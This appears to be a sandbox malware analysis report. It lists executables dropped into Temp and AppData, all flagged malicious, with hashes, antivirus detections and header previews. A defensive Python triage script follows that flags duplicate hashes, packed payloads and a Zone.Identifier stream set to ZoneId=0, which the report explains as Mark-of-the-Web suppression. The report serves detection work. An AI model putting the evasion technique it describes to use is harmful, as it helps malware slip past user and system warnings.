                                                                                                                      C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):537088
                                                                                                                      Entropy (8bit):5.840438491186833
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                      MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                      SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                      SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                      SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                       • Antivirus: Metadefender, Detection: 46%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 89%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                      C:\Users\user\AppData\Local\Temp\45AA.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):905216
                                                                                                                      Entropy (8bit):7.399713113456654
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                      MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                      SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                      SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                      SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                       • Antivirus: Metadefender, Detection: 34%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\54AF.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:MS-DOS executable
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):557664
                                                                                                                      Entropy (8bit):7.687250283474463
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                      MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                      SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                      SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                      SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                      C:\Users\user\AppData\Local\Temp\6AF7.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7336385
                                                                                                                      Entropy (8bit):7.993036026488077
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:196608:l++hvICteEroXxqENE+sKsXXgvkwuUxNhMC/CKN7kL:BInEroXjsKkXgs/EhWKNY
                                                                                                                      MD5:AE6510D9815C44A818F722ECAE6844B8
                                                                                                                      SHA1:2A34B5110F5C3C2424AE9685F57261E2546BD963
                                                                                                                      SHA-256:C3CAD582268B165711E2F2B1834891C7BCB5E57A7EFB1E709E3DF19D011AD656
                                                                                                                      SHA-512:8CAA9E661403D5D86F69E7C35E45CDF927EF9EC0C6045ED2CA5AF2EAAF26B4F99291EADAF2F0C8C00A31B05B228C6DF0C4BD205A7B3EC70E263313A08FFEF4F8
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d.....a.........."......6...T................@....................................%.p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\7808.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3590144
                                                                                                                      Entropy (8bit):7.997643531968
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:49152:3+N1VszZfKeEM30gwJHRUy0hsgpJx7SbEmW/DNYwtinYQYwDvvEipRiGqmkNajh1:381EKrHVRA2A/+NWxYZYYDvvNji7o
                                                                                                                      MD5:DA5C869D0ADE431230679390B5D183BF
                                                                                                                      SHA1:A0A3EC54CDC7762F78BF1DD2C5594F9A6AF2CBC3
                                                                                                                      SHA-256:98CE1395284401CDB5EBF5BDBCB02DDE9C404BEB668B7FF985794AE0408A5805
                                                                                                                      SHA-512:47EA2FF52B50F1E4CB27957451D6C50F2D90B861A4BAF9A96718749368D76491CF9B1D39AA23E059A2A589DC48BD1EF0C529AE201EAD635806CA89A276C82087
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@..........................pS.....#87.....................................|.N. .....M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@................P......................@.............1..`......................@....rsrc.........M.......0.............@....kujN2o2......N.......2.............@....adata.......`S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\8017.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):5.021094695416705
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:1P27QR0ir3uqVQ1Tf+1rkZlgEdLcHIH+2f9sFIILCbj4KQWylH28iYfx:1PYQR0i4krj58LIL0zy2
                                                                                                                      MD5:9DA91D9E3AD909FB8EBA4D3D74344982
                                                                                                                      SHA1:D5B6872D062043478CBA1002A815A013952D3837
                                                                                                                      SHA-256:0417281135837E3CCC11F35B2D17A6A3672B011E85C18884F54F6FEABA7B8069
                                                                                                                      SHA-512:29D672F0BB8AEE885F008F7B7EBED499E7C5D8738B9373BF169896BE85C271FAAB5BD9792C176C7CDCB1C39606F07041E1E54E8F893D1D91F49509DF927AA8A0
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\8017.exe, Author: Florian Roth
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!................0..J..........rh... ........@.. ...............................1....@................................. h..O...................................Tg..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............N..............@..B................Th......H........C..."...........e..p...........................................^..}.....(.......(.....*..*..0...............(...%.-...(.....s......s....... ....o...... ....o.....(....r...po......... ....s..........o.....[o....o.........o ....[o....o!......o"......o#....s$............io%......o&.........,...o'......o(........,..o'.........,..o'........+...*..(................"......................0............o).....(*.....s+....+..*...0...........s,.... ....(-.....(........r%..po/.
                                                                                                                      C:\Users\user\AppData\Local\Temp\88E2.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1474560
                                                                                                                      Entropy (8bit):6.247221725855881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:EhiK5YeyX+krf/WDW7lhw/Re3/gXfoGmxXS+TaeSmOsS6SVHdYPQLnfnqG6JJzTm:v4jyX+krf/WDW7lhw/Re3/gXfoGmxXSt
                                                                                                                      MD5:8C7457EEF295583195EF22683C133923
                                                                                                                      SHA1:DD03B6C66BDAFDFC9DDFA468072D0D2C7AE97733
                                                                                                                      SHA-256:E45E273ADB510E4D06F8D10B121740CDFABD862EA7D5617BCCE4BC9D81485939
                                                                                                                      SHA-512:6437E6C0F4E36110B2614CFAE192AF5F18654D83478DBC4807DF42112A5E407150E9EEDF652E29E20EABFCD169657C40B64E660E344C392CB61D8C492FD07DC8
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[(h...............0..v.............. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B........................H.......4...P.......+N...`..tg..................................................g.......y....(.O..*.s+I...b...**....(i...*f....(j...r...p(....(k...*f....ol...(m...ol...on...*.s.N.......*f....ol...r.'.p(....on...*f....o....rc'.p(....on...*f....o....r.'.p(....(k...*.....o....r/(.p(....r/!.p(....rq!.p(....(....on...*f....o....r.(.p(....(k...*f....o....r.(.p(....(k...*f....o....r.).p(....(k...*f....o....r.).p(....(k...*.~....:#...r;*.p(.....#...(....o....s.........~....*.~....*.~
                                                                                                                      C:\Users\user\AppData\Local\Temp\9789.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3602944
                                                                                                                      Entropy (8bit):7.997581797791447
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:98304:dUo6hIZwh7VTBNLQP/zCAtY5oujwp+sTEo2fSTUD1R:dUPhIZwhBzQD1GoufsbTUDT
                                                                                                                      MD5:E13718B977E0A61DEFA3A5313E1FBED6
                                                                                                                      SHA1:F70F1A541102F74517050D9731898592386196F4
                                                                                                                      SHA-256:2B13A7CCA8C39A41F4E760F432948D1E16DC75444B28FFAD71042F5817926AAE
                                                                                                                      SHA-512:2034240C486D46A8EC52C85892ACEEA2B9ABF6E5199AFD33FDB4AE6FE12FFA480006B0F93B5BF6CFB6AD9C1B5A58DFFDD26D05E4BAA7095948D7686ABFC040FC
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......O7.....................................|.O. ....pM...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@................P......................@.............1......./.................@....rsrc........pM.......0.............@....wZtCyLX......O......J2.............@....adata........S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\B1B2.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):301056
                                                                                                                      Entropy (8bit):5.192330972647351
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                      MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                      SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                      SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                      SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):321024
                                                                                                                      Entropy (8bit):6.6910111765717115
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:1dNi2kGfRHG5p1JX9BnaPGMq3yvNITJwD3EsG1ALc:XNsGfIfnpBCvuJw4sG+
                                                                                                                      MD5:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      SHA1:5362AF084622DC8EFC661C703D4C7C5DD6839BE1
                                                                                                                      SHA-256:0245C82558329CFD8EF5EF901E4929075D4D873BA20D9704731758580CAED7BE
                                                                                                                      SHA-512:F16FDD7212BC64F05EF67B41E29DD8966645B7FA0E7D78E8883503503A3589A090C54846500925F17B8DD1D133E1F5BB37BBDE16F3E5C50864847C17F7DF2C06
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....h_.........................................@.................................1...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....zafif..............................@....naladin............................@....ger................................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\FC2A.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):905216
                                                                                                                      Entropy (8bit):7.399713113456654
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                      MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                      SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                      SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                      SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\3136.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13666304
                                                                                                                      Entropy (8bit):3.7861536709741657
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:4vrN0pZXR3Srrj51BawxgIKP184NSWd2hQAjh3C:KrN0vR36TBHLY1JSWMQAt
                                                                                                                      MD5:5C50CF4AF77D12BF94B3FC09437C8B16
                                                                                                                      SHA1:C3D531F3C72F96EFCB00F932E744859755E88E54
                                                                                                                      SHA-256:43EF54A754F54F17F38D5D6AC207B1EF17953FD742A18124CCD2423E7E01B6F8
                                                                                                                      SHA-512:592FA7679DE8F8673287088C175EA7EB4D035B589F71C060F0151BF37FA4B55C13A96B8B214F26538768C1F64B891A9E5B7DFBF7481274F327C8CBC31518B296
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....}`..........................................@........................................................................4...P.......(........................................................... ...@...............L............................text............................... ..`.data...............................@....yocinoj............................@....lebe...............................@....wuno...............................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):321024
                                                                                                                      Entropy (8bit):6.6910111765717115
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:1dNi2kGfRHG5p1JX9BnaPGMq3yvNITJwD3EsG1ALc:XNsGfIfnpBCvuJw4sG+
                                                                                                                      MD5:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      SHA1:5362AF084622DC8EFC661C703D4C7C5DD6839BE1
                                                                                                                      SHA-256:0245C82558329CFD8EF5EF901E4929075D4D873BA20D9704731758580CAED7BE
                                                                                                                      SHA-512:F16FDD7212BC64F05EF67B41E29DD8966645B7FA0E7D78E8883503503A3589A090C54846500925F17B8DD1D133E1F5BB37BBDE16F3E5C50864847C17F7DF2C06
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....h_.........................................@.................................1...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....zafif..............................@....naladin............................@....ger................................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\vfgiwcs:Zone.Identifier
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                      Malicious:true
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
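Two things in the records above are worth pulling out programmatically rather than by eye. First, `BFBD.exe` and `vfgiwcs` share the same SHA-256 (`0245C825…CAED7BE`), so the Roaming copy is a byte-identical relocation of the same stage, not a new payload. Second, the `Zone.Identifier` alternate data stream written next to `vfgiwcs` carries `ZoneId=0`, which is URLZONE_LOCAL_MACHINE: a Mark-of-the-Web is only applied for zones 3 (Internet) and 4 (Restricted), so stamping zone 0 makes the dropped executable look locally created. The script below is an added example, not code from the report or from Joe Sandbox; it parses a constructed subset of the listing (paths, sizes, entropies and SHA-256 values copied from the records above, the 26-byte ADS content reconstructed from the report's preview) and flags duplicates by hash, near-random entropy (the 7.9 threshold is an assumption) and Zone.Identifier streams that suppress MOTW.

```python
"""Triage a Joe Sandbox "dropped files" listing (added example, not report code).

SAMPLE_LISTING is a constructed subset of the records above; the entropy
threshold is an assumption, not a value the report states.
"""
import re
from collections import defaultdict

# Constructed input: four records in the report's own "Key:Value" layout.
SAMPLE_LISTING = """\
C:\\Users\\user\\AppData\\Local\\Temp\\9789.exe
Size (bytes):3602944
Entropy (8bit):7.997581797791447
Encrypted:true
SHA-256:2B13A7CCA8C39A41F4E760F432948D1E16DC75444B28FFAD71042F5817926AAE
C:\\Users\\user\\AppData\\Local\\Temp\\BFBD.exe
Size (bytes):321024
Entropy (8bit):6.6910111765717115
Encrypted:false
SHA-256:0245C82558329CFD8EF5EF901E4929075D4D873BA20D9704731758580CAED7BE
C:\\Users\\user\\AppData\\Roaming\\vfgiwcs
Size (bytes):321024
Entropy (8bit):6.6910111765717115
Encrypted:false
SHA-256:0245C82558329CFD8EF5EF901E4929075D4D873BA20D9704731758580CAED7BE
C:\\Users\\user\\AppData\\Roaming\\vfgiwcs:Zone.Identifier
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
"""

# The ADS content as the report previews it: 26 bytes, CRLF line endings.
ZONE_IDENTIFIER_BYTES = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# URLMON security zones; only 3 and 4 carry a Mark-of-the-Web.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted",
              3: "Internet", 4: "Restricted"}

PACKED_ENTROPY = 7.9  # assumption: above this the bytes are effectively random
RECORD_START = re.compile(r"^[A-Za-z]:\\")  # a bare Windows path opens a record


def parse_listing(text):
    """Split the listing into one dict per dropped file, keyed by field name."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if RECORD_START.match(line):
            records.append({"path": line})
        elif records and ":" in line:
            key, value = line.split(":", 1)
            records[-1][key.strip()] = value.strip()
    return records


def parse_zone_identifier(data):
    """Parse a Zone.Identifier stream (INI text) into its ZoneTransfer keys."""
    values, section = {}, None
    for raw in data.decode("ascii", errors="replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip()] = value.strip()
    return values


def triage(records, zone_streams):
    """Flag byte-identical copies, packed payloads and MOTW suppression.

    zone_streams maps "<file>:Zone.Identifier" paths to the stream bytes.
    """
    by_hash = defaultdict(list)
    for r in records:
        if "SHA-256" in r:
            by_hash[r["SHA-256"]].append(r["path"])
    findings = {
        # same SHA-256 at two paths: a relocated copy, not a new stage
        "duplicates": {h: p for h, p in by_hash.items() if len(p) > 1},
        # near-maximal entropy: a compressed or encrypted container to unpack
        "packed": [r["path"] for r in records
                   if float(r.get("Entropy (8bit)", "0")) >= PACKED_ENTROPY],
        # Zone.Identifier present but below zone 3: stamped as local content
        "motw_suppressed": [],
    }
    for stream_path, data in zone_streams.items():
        zone = parse_zone_identifier(data).get("ZoneId")
        if zone is not None and int(zone) < 3:
            host = stream_path.rsplit(":Zone.Identifier", 1)[0]
            findings["motw_suppressed"].append((host, ZONE_NAMES[int(zone)]))
    return findings


if __name__ == "__main__":
    streams = {"C:\\Users\\user\\AppData\\Roaming\\vfgiwcs:Zone.Identifier":
               ZONE_IDENTIFIER_BYTES}
    for kind, hits in triage(parse_listing(SAMPLE_LISTING), streams).items():
        print(kind, hits)
```

On a live host the same check is `Get-Content -Path <file> -Stream Zone.Identifier` in PowerShell; a Zone.Identifier stream that exists but says `ZoneId=0` on an executable dropped under `%APPDATA%` by `explorer.exe` is itself the indicator, because the legitimate writers of that stream (browsers, mail clients, archivers) record zone 3.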
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Process:C:\Windows\System32\svchost.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Reputation:unknown
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220115_050436_607.etl
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):3.375971674018937
Encrypted:false
SSDEEP:96:VC5Hf/o+Wco5dyE9P/YsZACXxFI2lQGgkhnp4vezT2AjFzONMCidJRRj5N:M98Hpg2wuPCCP
MD5:8306EA709D3745A390765D410EC31DAE
SHA1:936DBE90F785ED33F45FC201D7BC814E11F5308F
SHA-256:1A86E818169EEE39C19C4CF088EE777782FC15A652CF287228B748F4284CA90A
SHA-512:59D2CBB5C9474B7E46D1A590DD67BFAB68A7CBBDA7B966EAF00A10A121E50F97C655088108B74EB357685E99E347243B4A8905A224423279B5E9710F8C145CCC
Malicious:false
Reputation:unknown
